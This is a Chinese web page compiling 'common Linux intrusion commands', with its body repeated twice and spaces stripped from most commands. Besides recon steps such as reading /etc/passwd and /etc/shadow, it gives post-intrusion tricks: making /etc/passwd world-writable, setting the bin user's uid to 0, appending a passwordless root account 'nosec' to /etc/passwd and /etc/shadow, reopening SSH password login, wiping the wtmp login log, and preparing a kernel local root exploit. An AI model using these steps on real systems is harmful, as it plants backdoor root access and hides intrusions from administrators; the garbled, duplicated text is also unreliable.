linux入侵常用命令汇编
Linux 常用命令 入侵 汇编
2023-06-13 09:14:11 时间
cat/etc/passwd查看linux用户
cat/etc/shadow查看用户密码需要root权限
cat/etc/sysconfig/network-scripts/ifcfg-ethnN代表网卡号查看所在网卡的ip信息
ifconfig查看本机ip信息
cat/etc/resolv.conf查看DNS信息
bash-i在反弹的shell中使用可以直观显示命令
bashprompt:当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成
bash#。
系统变量:试着echo"$USER/$EUID"系统应该会告诉你它认为你是什么用户。
echo1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo1>/proc/sys/net/ipv4/ip_forward,
vim/proc/sys/net/ipv4/ip_forward吧,默认是0,也就是内核不进行数据包过滤,改为1,让内核对数据包进行filter处理!
netstat-an|grepLISTEN|grep:80查看端口
service--status-all|greprunning
service--status-all|grephttp
查看运行服务
lsb_release-a查看系统版本
重启ssh服务:/usr/sbin/sshdstop
/usr/sbin/sshdstart
ssd_config文件里
PasswordAuthenticationno,
将其改为
PasswordAuthenticationyes
远程ssh才可登录
否则显示Accessdenied
其中Usepamyes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod777/etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp/bin/bash/sbin/nologin
然后su的时候su-bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
还可以这样
sed-is/bin:x:1:1/bin:x:0:1/g/etc/passwd
gccprtcl2.c?olocal?static?Wall
echo"nosec:x:0:0::/:/bin/sh">>/etc/passwd
echo"nosec::-1:-1:-1:-1:-1:-1:500">>/etc/shadow
清空last记录cp/dev/null/var/log/wtmp
-----
ddif=/dev/zeroof=yourfilebs=10Mcount=10建立一个100m的大文件在利用LinuxKernel<=2.6.17.4(proc)LocalRootExploit提权的时候要用到的。
cat/etc/shadow查看用户密码需要root权限
cat/etc/sysconfig/network-scripts/ifcfg-ethnN代表网卡号查看所在网卡的ip信息
ifconfig查看本机ip信息
cat/etc/resolv.conf查看DNS信息
bash-i在反弹的shell中使用可以直观显示命令
bashprompt:当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成
bash#。
系统变量:试着echo"$USER/$EUID"系统应该会告诉你它认为你是什么用户。
echo1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo1>/proc/sys/net/ipv4/ip_forward,
vim/proc/sys/net/ipv4/ip_forward吧,默认是0,也就是内核不进行数据包过滤,改为1,让内核对数据包进行filter处理!
netstat-an|grepLISTEN|grep:80查看端口
service--status-all|greprunning
service--status-all|grephttp
查看运行服务
lsb_release-a查看系统版本
重启ssh服务:/usr/sbin/sshdstop
/usr/sbin/sshdstart
ssd_config文件里
PasswordAuthenticationno,
将其改为
PasswordAuthenticationyes
远程ssh才可登录
否则显示Accessdenied
其中Usepamyes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod777/etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp/bin/bash/sbin/nologin
然后su的时候su-bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
还可以这样
sed-is/bin:x:1:1/bin:x:0:1/g/etc/passwd
gccprtcl2.c?olocal?static?Wall
echo"nosec:x:0:0::/:/bin/sh">>/etc/passwd
echo"nosec::-1:-1:-1:-1:-1:-1:500">>/etc/shadow
清空last记录cp/dev/null/var/log/wtmp
-----
ddif=/dev/zeroof=yourfilebs=10Mcount=10建立一个100m的大文件在利用LinuxKernel<=2.6.17.4(proc)LocalRootExploit提权的时候要用到的。
相关文章
- Linux常用命令实例解析(linux常用命令实例详解)
- Linux中管理进程的常用命令(linux进程操作命令)
- 客入侵黑客闯入:Linux系统遭到破坏(linux被黑)
- Linux命令连接FTP服务器的技巧(linux命令连接ftp)
- Linux最强命令汇总大全(linux常用命令总结)
- 最合适Linux入门:最佳选择书籍指南(linux入门哪本书)
- 串Linux实现字符串替换的方法(linux替换字符)
- Linux下重启进程的脚本实现方式(linux重启进程脚本)
- 让Linux自动为你缩进(linux自动缩进)
- Linux测试环境搭建:实现技术自动化(linux测试环境搭建)
- 稳健运行:Linux 运行环境构建之旅(linux运行环境)
- 服务器FTP攻击导致Linux服务器面临的威胁(ftp入侵linux)
- Linux 运维技巧:常用命令知多少(linux运维常用命令)
- Linux 传输命令:掌握网络之重要工具(linux传输命令)
- Linux下查看用户常用命令(linux查看用户命令)
- Linux黑客入侵技术教程(linux入侵教程)
- Linux常用命令25字教程(linux常用命令教程)
- 完美实现监控Linux系统,全面掌握系统状态(监控linux系统)
- Linux命令大全:快速掌握常用命令,助你轻松操作Linux!(linux命令题目)
- 安全性Linux 网银:最高安全性保障(linux网银)
- 指南Linux常用命令快速上手指南(linux常用命令使用)
- 深入探索Linux系统时间查看技巧(如何查看linux时间)
- 使用Linux优化你的机械硬盘性能(linux机械硬盘)
- 探究Linux常用命令,帮你提高效率!(linux有哪些命令)
- Linux实用命令大全:25个常用命令速览(linux的所有命令)
- Linux存储大小:如何管理您的磁盘空间?(linux存储大小)
- Linux中如何使用sz命令来传输文件(linux的sz命令)